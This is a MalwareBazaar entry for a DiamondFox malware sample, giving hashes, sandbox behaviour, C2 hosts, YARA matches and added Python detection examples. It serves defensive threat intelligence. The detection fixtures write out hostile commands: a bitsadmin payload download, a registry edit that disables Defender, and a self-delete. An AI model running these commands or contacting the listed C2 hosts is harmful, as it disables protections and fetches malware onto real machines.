MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



DiamondFox


Vendor detections: 12



SHA256 hash: 76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93
SHA3-384 hash: 1d63412f2a4b8ffe198b385fd7d8cbfb68bdf03d59e4ec4606192a3f85a8179147b7c666d65124a75b2148f6adc7c8d8
SHA1 hash: 696bd5772f35e7029fff2ec5a5a170b0df1e0157
MD5 hash: 6e7c73591f14dc0be945a5afccb7b9fd
humanhash: queen-triple-gee-washington
File name: 6E7C73591F14DC0BE945A5AFCCB7B9FD.exe
Signature: DiamondFox
File size: 4'424'724 bytes
First seen: 2021-07-08 10:30:36 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: fcf1390e9ce472c7270447fc5c61a0c1 (shared with 863 DCRat, 118 NanoCore and 94 njrat samples on MalwareBazaar, so it is not a family-specific pivot)
ssdeep: 98304:UbZe1z/BopUOHzdizE4v9GRkyZ9ZiVdWtxmCN:UNeT1Sooo9GBjZiVdXCN
Threatray: 974 similar samples on MalwareBazaar
TLSH: T18F2633916CE0D0B2D16716764A3D6B22447DBC208E6CCEEF5798095FDA32181FB36B93
Reporter: abuse_ch
Tags: DiamondFox exe


abuse_ch
DiamondFox C2:
65.21.122.45:8085

Indicators Of Compromise (IOCs)


Below is a list of indicators of compromise (IOCs) associated with this malware sample.

IOC | ThreatFox reference
65.21.122.45:8085 | https://threatfox.abuse.ch/ioc/158437/
95.213.224.25:80 | https://threatfox.abuse.ch/ioc/158445/
http://purchatewow.xyz/g6Vce4s2S/index.php | https://threatfox.abuse.ch/ioc/158446/
http://34.89.184.90/ | https://threatfox.abuse.ch/ioc/158448/

Intelligence


File Origin
# of uploads: 1
# of downloads: 143
Origin country: n/a
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
6E7C73591F14DC0BE945A5AFCCB7B9FD.exe
Verdict:
Malicious activity
Analysis date:
2021-07-08 10:36:55 UTC
Tags:
autoit evasion trojan rat redline phishing stealer

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Result
Threat name:
Backstage Stealer RedLine SmokeLoader So
Detection:
malicious
Classification:
troj.spyw.evad
Score:
100 / 100
Signature
Allocates memory in foreign processes
Antivirus detection for dropped file
Antivirus detection for URL or domain
Binary is likely a compiled AutoIt script file
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Detected unpacking (overwrites its own PE header)
Detected VMProtect packer
Disable Windows Defender real time protection (registry)
DLL reload attack detected
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found C&C like URL pattern
Machine Learning detection for dropped file
Machine Learning detection for sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Renames NTDLL to bypass HIPS
Sample is protected by VMProtect
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Svchost Process
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Backstage Stealer
Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Socelars
Behaviour
Behavior Graph:
Behavior Graph ID: 445810
Sample: Mh2FzBrd3m.exe
Start date: 08/07/2021
Architecture: WINDOWS
Score: 100

Root node
Network: download-serv-632457.xyz (104.21.8.151:443, CLOUDFLARENETUS, United States); email.yg9.me (198.13.62.186, AS-CHOOPAUS, United States)
Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Antivirus detection for dropped file; 18 other signatures
Started: Mh2FzBrd3m.exe; iexplore.exe

Mh2FzBrd3m.exe
Dropped: C:\Users\user\Desktop\pub2.exe (PE32); C:\Users\user\Desktop\jg3_3uag.exe (PE32); C:\Users\user\Desktop\KRSetp.exe (PE32); 7 other files (2 malicious)
Started: Infos.exe; pub2.exe; Folder.exe; 6 other processes

iexplore.exe
Started: iexplore.exe (child), which contacts iplogger.org

Infos.exe
Network: www.jinhuamz.com (103.155.92.207:80, TWIDC-AS-APTWIDCLimitedHK, country unknown); 13 other IPs or domains
Dropped: C:\Users\...\yWtSYVY4TK_QCMtkFpaXicVf.exe (PE32); C:\Users\...\ukH7Pe4QK3y4Yq_bYAIBTt8E.exe (PE32); C:\Users\...\oKvbfQEkGocK1UBmlS7eaTdQ.exe (PE32); 33 other files (26 malicious)
Signatures: Drops PE files to the document folder of the user; Performs DNS queries to domains with low reputation; Disable Windows Defender real time protection (registry)

pub2.exe
Dropped: C:\Users\user\AppData\Local\Temp\CC4F.tmp (PE32)
Signatures: DLL reload attack detected; Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Renames NTDLL to bypass HIPS; Checks if the current machine is a virtual machine (disk enumeration)

Folder.exe
Dropped: C:\Users\user\AppData\Local\Temp\axhub.dll (PE32)
Started: rundll32.exe; conhost.exe

rundll32.exe
Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)

6 other processes started by Mh2FzBrd3m.exe
Network: 176.113.115.136 (SELECTELRU, Russian Federation); videoconvert-download38.xyz (172.67.201.250:443, CLOUDFLARENETUS, United States); 11 other IPs or domains
Dropped: C:\Users\user\Documents\...\jg3_3uag.exe (PE32); C:\Users\user\AppData\Roaming\2010394.exe (PE32); 8 other files (5 malicious)
Signatures: Detected unpacking (overwrites its own PE header)
Started: File.exe; jfiag3g_gg.exe

File.exe
Network: newja.webtm.ru (92.53.96.150:80, TIMEWEB-ASRU, Russian Federation)
Dropped: C:\Users\Public\run.exe (PE32)
Signatures: Binary is likely a compiled AutoIt script file; Drops PE files to the user root directory
Started: run.exe

jfiag3g_gg.exe
Signatures: Tries to harvest and steal browser information (history, passwords, etc)
Threat name:
Win32.Trojan.Tiggre
Status:
Malicious
First seen:
2021-07-06 21:49:00 UTC
AV detection:
19 of 29 (65.52%)
Threat level:
5/5
Result
Malware family:
Score:
10/10
Tags:
family:redline family:smokeloader family:socelars family:vidar botnet:#2 botnet:07_07_r botnet:sel7 backdoor evasion infostealer persistence spyware stealer themida trojan upx vmprotect
Behaviour
Checks SCSI registry key(s)
Delays execution with timeout.exe
Download via BitsAdmin
Kills process with taskkill
Modifies Internet Explorer settings
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
NSIS installer
Enumerates physical storage devices
Program crash
autoit_exe
Adds Run key to start application
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
VMProtect packed file
Process spawned unexpected child process
RedLine
RedLine Payload
SmokeLoader
Socelars
Socelars Payload
Vidar
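The two sandbox reports above describe the process-level behaviours (execution from dropped locations, rundll32 loading a DLL from Temp, the "cmd ping IP nul del" cleanup, BitsAdmin downloads, Defender real-time protection disabled through the registry, an unexpected svchost parent) but not the detection logic that flags them. The following is an added example, not code from MalwareBazaar or either sandbox: it runs Sigma-style process-creation rules over constructed Sysmon-like events. Image paths are taken from the behaviour graph; the command lines, the folder list in `exec_from_suspicious_folder` and the event field names are assumptions.

```python
"""Process-creation detections for the behaviours both sandbox reports list.
Added example: not part of the MalwareBazaar page nor any sandbox's own rules."""
import re

# Constructed Sysmon-style events. Image paths are taken from the behaviour
# graph above; command lines are assumptions, since the page names the
# behaviour (e.g. "Download via BitsAdmin") but not the exact command.
EVENTS = [
    {"Image": r"C:\Users\user\Desktop\Mh2FzBrd3m.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Mh2FzBrd3m.exe"'},
    {"Image": r"C:\Users\Public\run.exe",
     "ParentImage": r"C:\Users\user\Desktop\File.exe",
     "CommandLine": r'"C:\Users\Public\run.exe"'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Users\user\Desktop\Folder.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\AppData\Local\Temp\axhub.dll",Start'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\2010394.exe",
     "CommandLine": r'cmd.exe /c ping 127.0.0.1 -n 3 > nul & del "C:\Users\user\AppData\Roaming\2010394.exe"'},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "ParentImage": r"C:\Users\user\Desktop\Infos.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high http://example.invalid/p.bin C:\Users\user\AppData\Local\Temp\CC4F.tmp"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Users\user\Desktop\Infos.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f'},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Users\user\AppData\Roaming\2010394.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"Image": r"C:\Windows\System32\svchost.exe",   # benign control case
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]


def _image_is(ev, name):
    return ev["Image"].lower().endswith("\\" + name)


def exec_from_suspicious_folder(ev):
    """Analogue of Sigma 'Execution from Suspicious Folder'. The folder list is an
    assumption drawn from the drop locations on this page: Users\\Public and
    AppData\\Local\\Temp anywhere, AppData\\Roaming only at its root (subfolders
    there hold many legitimate per-user installs). Tune for your estate."""
    image = ev["Image"].lower()
    return ("\\users\\public\\" in image
            or "\\appdata\\local\\temp\\" in image
            or re.search(r"\\appdata\\roaming\\[^\\]+$", image) is not None)


def rundll32_dll_from_temp(ev):
    """rundll32.exe given a DLL under a Temp directory (Folder.exe -> axhub.dll above)."""
    return _image_is(ev, "rundll32.exe") and "\\temp\\" in ev["CommandLine"].lower()


def ping_del_cleanup(ev):
    """The 'cmd ping IP nul del' self-delete pattern of the Ping_Del_method rule."""
    return _image_is(ev, "cmd.exe") and re.search(
        r"\bping\b.*\bnul\b.*\bdel\b", ev["CommandLine"], re.I) is not None


def bitsadmin_download(ev):
    return _image_is(ev, "bitsadmin.exe") and "/transfer" in ev["CommandLine"].lower()


def defender_realtime_disabled(ev):
    """DisableRealtimeMonitoring is the real policy value name; how the sample set it is not on the page."""
    return "disablerealtimemonitoring" in ev["CommandLine"].lower()


def svchost_unexpected_parent(ev):
    """Analogue of Sigma 'Suspicious Svchost Process': svchost.exe not spawned by
    services.exe (add MsMpEng.exe / Mrt.exe to the allow list in production)."""
    return _image_is(ev, "svchost.exe") and not ev["ParentImage"].lower().endswith("\\services.exe")


RULES = [exec_from_suspicious_folder, rundll32_dll_from_temp, ping_del_cleanup,
         bitsadmin_download, defender_realtime_disabled, svchost_unexpected_parent]


def evaluate(events=EVENTS):
    """Return {event index: [names of rules that fired]} for events with at least one hit."""
    hits = {}
    for i, ev in enumerate(events):
        fired = [rule.__name__ for rule in RULES if rule(ev)]
        if fired:
            hits[i] = fired
    return hits


if __name__ == "__main__":
    for i, names in evaluate().items():
        print(i, EVENTS[i]["Image"], names)
```

Each rule is deliberately narrow and matches on the image or parent path rather than the process name alone, which is the main lever for keeping false positives down; the benign svchost event at the end is there to show the parent check doing its job.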
Malware Config
C2 Extraction:
shurinedn.xyz:80
http://conceitosseg.com/upload/
http://integrasidata.com/upload/
http://ozentekstil.com/upload/
http://finbelportal.com/upload/
http://telanganadigital.com/upload/
xtarweanda.xyz:80
kathonaror.xyz:80
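The ThreatFox IOC table and the C2 extraction above mix three IOC shapes (IP:port, host:port, full URL), and a log search that treats them as plain substrings will miss a URL fetched with a different path or a connection to a listed IP on a different port. The following is an added example, not code from MalwareBazaar or ThreatFox: it normalises the IOCs listed on this page and matches them against constructed proxy log lines, reporting an exact hit when host, port and path all agree and a host-only hit when only the host matches. The log format (`timestamp client dst_host:dst_port method url`) and the log lines are assumptions; the IOC values are those listed above.

```python
"""Match the network IOCs listed in this entry against constructed proxy log lines.
Added example, not part of the MalwareBazaar page."""
from urllib.parse import urlsplit

# IOCs copied from the ThreatFox table and the sandbox C2 extraction above.
PAGE_IOCS = [
    "65.21.122.45:8085",
    "95.213.224.25:80",
    "http://purchatewow.xyz/g6Vce4s2S/index.php",
    "http://34.89.184.90/",
    "shurinedn.xyz:80",
    "http://conceitosseg.com/upload/",
    "http://integrasidata.com/upload/",
    "http://ozentekstil.com/upload/",
    "http://finbelportal.com/upload/",
    "http://telanganadigital.com/upload/",
    "xtarweanda.xyz:80",
    "kathonaror.xyz:80",
]

# Constructed log lines in an assumed format:
#   timestamp client dst_host:dst_port method url-or-dash
SAMPLE_LOG = """\
2021-07-08T10:31:02Z 10.0.0.7 65.21.122.45:8085 POST -
2021-07-08T10:31:09Z 10.0.0.7 purchatewow.xyz:80 GET http://purchatewow.xyz/g6Vce4s2S/index.php
2021-07-08T10:31:15Z 10.0.0.9 conceitosseg.com:80 POST http://conceitosseg.com/upload/
2021-07-08T10:31:20Z 10.0.0.9 www.example.com:443 GET https://www.example.com/
2021-07-08T10:31:33Z 10.0.0.7 65.21.122.45:443 CONNECT -
2021-07-08T10:31:40Z 10.0.0.12 34.89.184.90:80 GET http://34.89.184.90/favicon.ico
"""


def parse_ioc(ioc):
    """Normalise an IOC into (host, port, path).
    port or path is None when the IOC does not constrain it."""
    if "://" in ioc:
        u = urlsplit(ioc)
        port = u.port or (443 if u.scheme == "https" else 80)
        return u.hostname.lower(), port, (u.path or "/")
    host, sep, port = ioc.rpartition(":")
    if not sep:                      # bare host or IP
        return ioc.lower(), None, None
    return host.lower(), int(port), None


def match_line(line, iocs=PAGE_IOCS):
    """Return ("exact", ioc), ("host-only", ioc) or None for one log line.
    An exact hit needs host, port and (for URL IOCs) a path under the IOC path;
    a host-only hit is a listed host seen on another port or path."""
    fields = line.split(maxsplit=4)
    if len(fields) != 5:
        return None
    _ts, _client, dst, _method, url = fields
    dst_host, _, dst_port = dst.rpartition(":")
    dst_host, dst_port = dst_host.lower(), int(dst_port)
    log_path = None if url == "-" else (urlsplit(url).path or "/")
    weak = None
    for ioc in iocs:
        host, port, path = parse_ioc(ioc)
        if host != dst_host:
            continue
        port_ok = port is None or port == dst_port
        path_ok = path is None or (log_path is not None and log_path.startswith(path))
        if port_ok and path_ok:
            return ("exact", ioc)
        weak = weak or ("host-only", ioc)
    return weak


def scan_log(text=SAMPLE_LOG, iocs=PAGE_IOCS):
    """Return [(line_number, confidence, ioc)] for every line that hit an IOC."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = match_line(line, iocs)
        if m:
            hits.append((n, m[0], m[1]))
    return hits


if __name__ == "__main__":
    for n, confidence, ioc in scan_log():
        print(f"line {n}: {confidence:9s} {ioc}")
```

Line 5 of the constructed log is the case worth noticing: the DiamondFox C2 address on port 443 instead of 8085 is still reported, but as host-only, so an analyst can triage it separately from the exact matches. Path matching is prefix-based so that a listed `/upload/` endpoint also catches `/upload/anything`.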
Unpacked files
SHA256 hash:
8ac07124315f36db78c157ed5d2c3d7ed75120ecc4d0d4a6622de2a98f587c16
MD5 hash:
2f1ae78cae116a020760f54479c3e9b3
SHA1 hash:
433fe2252e21043a302af27a6a0741499cefd4ed
SHA256 hash:
10a122bd647c88aa23f96687e26b251862e83be9dbb89532f4a578689547972d
MD5 hash:
89c739ae3bbee8c40a52090ad0641d31
SHA1 hash:
d0f7dc9a0a3e52af0f9f9736f26e401636c420a1
SHA256 hash:
4826f8881d91075a3be54defb778f2fbabee3730afd77d0e0fb9df8b36279b2e
MD5 hash:
e21179e02e3c5df20739130690444fe5
SHA1 hash:
e948c3b760a2fab0f9db2b3f80001cf787b83542
SHA256 hash:
6e944a5c9522ee0cd6a292d8e9a454e0ef4f8ae652ddb022e5b80fb6d8559f9d
MD5 hash:
3b1563f44f68d4e5e4490924c5c2a19a
SHA1 hash:
a7d7537809dce6b6200951cbcf5549c57162aed7
SHA256 hash:
800aed6f311b0c6842cee6d46c97e48603e8978e0a017608f880bb21806d82d1
MD5 hash:
cd3c6c930d2a581fbf0be30a170d22e2
SHA1 hash:
3b67cbe0a6f27b4746d98ba170d3215850b0d57d
SHA256 hash:
bd9afd883e9ffef0535c464d6b9b6f8671236adfa3e49b646d52f762fd2e6c32
MD5 hash:
9304bc8371fe453dfda577fd3af9bf6b
SHA1 hash:
5f3d5d0bc7ae163e1ae42a0acd1435b8b263333c
SHA256 hash:
67cdc7c5de5e46229adc831dc6fd3053d996ecf02e94706b6b6ae1b0ed976f2c
MD5 hash:
555b5b60b2dcc53e71e6d9ba8302c4b9
SHA1 hash:
550326b1226629a867d4606ad0c98c4ef9596b47
SHA256 hash:
574a1e8093a8a16ebc96234701b1b14851f0c3bd2d5d5f687be59ac09b6554f3
MD5 hash:
08ff8f4643d75e0e160dfe7d9c9c006a
SHA1 hash:
890c655b9b28e0ac6bac1c8666b5b4be47011867
SHA256 hash:
55cdb9054f66ed88b8215d9f981efd7421c6f50dc9285140ec5ff591e34121bd
MD5 hash:
5631522a0758055c133e7966c1948802
SHA1 hash:
90caf8180bf43727fc490ffa34b1d578833aad7f
SHA256 hash:
3e62ffd46bb97dad1c9542d7c310fd76307934b38a4ade5d4100cd00aaffa880
MD5 hash:
1098fd963a65a47d1e9da0e0768ee83c
SHA1 hash:
f107d50e8bd9e94f902a46d429a088379f236e83
SHA256 hash:
61726a448ca99d1b0f9cdaa88095db0135995b9994b2a553932e5c19108d9778
MD5 hash:
d1c35656d6a0da2a38765a35d4f1a431
SHA1 hash:
0474082666239da6792d58cfb98ac048b52d1d54
SHA256 hash:
3cca3f6c7d9e37e1eb9c90650a9c10781082aba2a6f6629077712e0c3e527ec7
MD5 hash:
4f0ed7c51d3975e1f84a7fa8d0277254
SHA1 hash:
16b1ec5559460d666cc5737330f7a915daaeabdd
SHA256 hash:
5e0c437319e76a2ed70ef13af8e52f9d0a5d57f3d72b14b13372f1d58c4e8e50
MD5 hash:
f721d8fd486186264986aacaf7536ca6
SHA1 hash:
545a86ebd25eaa038c2360a149fb9174a460d482
SHA256 hash:
71b265ca1f32bb594f6ce963a598fe9d4b38f75e0f73148d651b53c6179e854d
MD5 hash:
dae724ff4e2523686867ea7096f0b6f1
SHA1 hash:
3ec5e6829c82eb3e7b2f17eacbb49028c9eda7c3
Detections:
win_socelars_auto
SHA256 hash:
8ddd7e5fecbc3cb9ef3dd0bfdb15bc872b74617f5fad07e872a6fce9d9d60e41
MD5 hash:
be722cf73d7aaba752f103beb792d749
SHA1 hash:
26d48b7a10906cb830ac812aee33fa0133f4ae3e
SHA256 hash:
76b87f4f61c849a8af46ebdcb899a0bea036b18f6b473bed34562212eab16b93
MD5 hash:
6e7c73591f14dc0be945a5afccb7b9fd
SHA1 hash:
696bd5772f35e7029fff2ec5a5a170b0df1e0157
Please note that we are no longer able to provide a coverage score for VirusTotal.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name:Amadey
Author:kevoreilly
Description:Amadey Payload
Rule name:Glasses
Author:Seth Hardy
Description:Glasses family
Rule name:GlassesCode
Author:Seth Hardy
Description:Glasses code features
Rule name:INDICATOR_EXE_Packed_Themida
Author:ditekSHen
Description:Detects executables packed with Themida
Rule name:INDICATOR_EXE_Packed_VMProtect
Author:ditekSHen
Description:Detects executables packed with VMProtect.
Rule name:INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
Author:ditekSHen
Description:Detects executables containing SQL queries to confidential data stores. Observed in infostealers
Rule name:INDICATOR_SUSPICIOUS_Stomped_PECompilation_Timestamp_InTheFuture
Author:ditekSHen
Description:Detect executables with stomped PE compilation timestamp that is greater than local current time
Rule name:MALWARE_Win_HyperBro03
Author:ditekSHen
Description:Hunt HyperBro IronTiger / LuckyMouse / APT27 malware
Rule name:MALWARE_Win_RedLine
Author:ditekSHen
Description:Detects RedLine infostealer
Rule name:Ping_Del_method_bin_mem
Author:James_inthe_box
Description:cmd ping IP nul del
Rule name:suspicious_packer_section
Author:@j0sm1
Description:The packer/protector section names/keywords
Reference:http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/
Rule name:SUSP_XORed_Mozilla
Author:Florian Roth
Description:Detects suspicious XORed keyword - Mozilla/5.0
Reference:Internal Research
Rule name:SUSP_XORed_MSDOS_Stub_Message
Author:Florian Roth
Description:Detects suspicious XORed MSDOS stub message
Reference:https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Rule name:win_smokeloader_a2
Author:pnx
Rule name:with_sqlite
Author:Julian J. Gonzalez <info@seguridadparatodos.es>
Description:Rule to detect the presence of SQLite data in raw image
Reference:http://www.st2labs.com
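Two of the rules that matched, SUSP_XORed_Mozilla and SUSP_XORed_MSDOS_Stub_Message, do not look for their keyword in the clear: they look for it under every single-byte XOR key, which is what YARA's `xor` string modifier (linked in the reference above) does and which catches a packed or obfuscated stage that hides its user agent or an embedded PE. The following is an added example, not code from the page or from those rules' author: a Python implementation of the same scan over a constructed buffer, with the plaintext keyword (key 0) deliberately excluded because an unobfuscated keyword is what a benign binary contains. The buffer, keys and offsets are constructed; nothing here is from the real sample.

```python
"""Single-byte-XOR keyword scan: the technique behind YARA's `xor` string
modifier that the SUSP_XORed_Mozilla / SUSP_XORed_MSDOS_Stub_Message rules use.
Added example, not part of the page or of those rules."""

# The two keywords those rules look for.
KEYWORDS = [b"Mozilla/5.0", b"This program cannot be run in DOS mode"]


def xor_bytes(data, key):
    """XOR every byte of data with one single-byte key."""
    return bytes(b ^ key for b in data)


def find_xored(buf, keyword, keys=range(1, 256)):
    """Return [(offset, key)] for every place keyword XOR key occurs in buf.
    Key 0 is excluded on purpose: the plaintext keyword is not what these
    rules flag. Cost is 255 substring searches per keyword, which is cheap."""
    hits = []
    for key in keys:
        needle = xor_bytes(keyword, key)
        start = buf.find(needle)
        while start != -1:
            hits.append((start, key))
            start = buf.find(needle, start + 1)
    return hits


def decode_at(buf, offset, length, key):
    """Recover plaintext behind a hit; widen length if the same key covers a larger region."""
    return xor_bytes(buf[offset:offset + length], key)


def scan(buf, keywords=KEYWORDS):
    """Map each keyword to its hits, omitting keywords that never occur."""
    result = {}
    for kw in keywords:
        hits = find_xored(buf, kw)
        if hits:
            result[kw] = hits
    return result


# Constructed sample: padding, "Mozilla/5.0" XOR 0x5A at offset 16, a fake
# MZ marker, then the DOS stub message XOR 0x21 at offset 37.
SAMPLE = (b"\x00" * 16
          + xor_bytes(b"Mozilla/5.0", 0x5A)
          + b"MZ" + b"\x90" * 8
          + xor_bytes(b"This program cannot be run in DOS mode", 0x21)
          + b"\xff" * 4)


if __name__ == "__main__":
    for kw, hits in scan(SAMPLE).items():
        for off, key in hits:
            plain = decode_at(SAMPLE, off, len(kw), key)
            print(f"{kw!r} at offset {off} under key 0x{key:02x}: {plain!r}")
```

The key recovered for the DOS stub message is usually the key for the whole embedded PE, so `decode_at` with a larger length is the quickest way to carve the hidden payload out for its own hash and its own MalwareBazaar lookup. YARA's `xor(0x01-0xff)` range syntax expresses the same key-0 exclusion.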

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments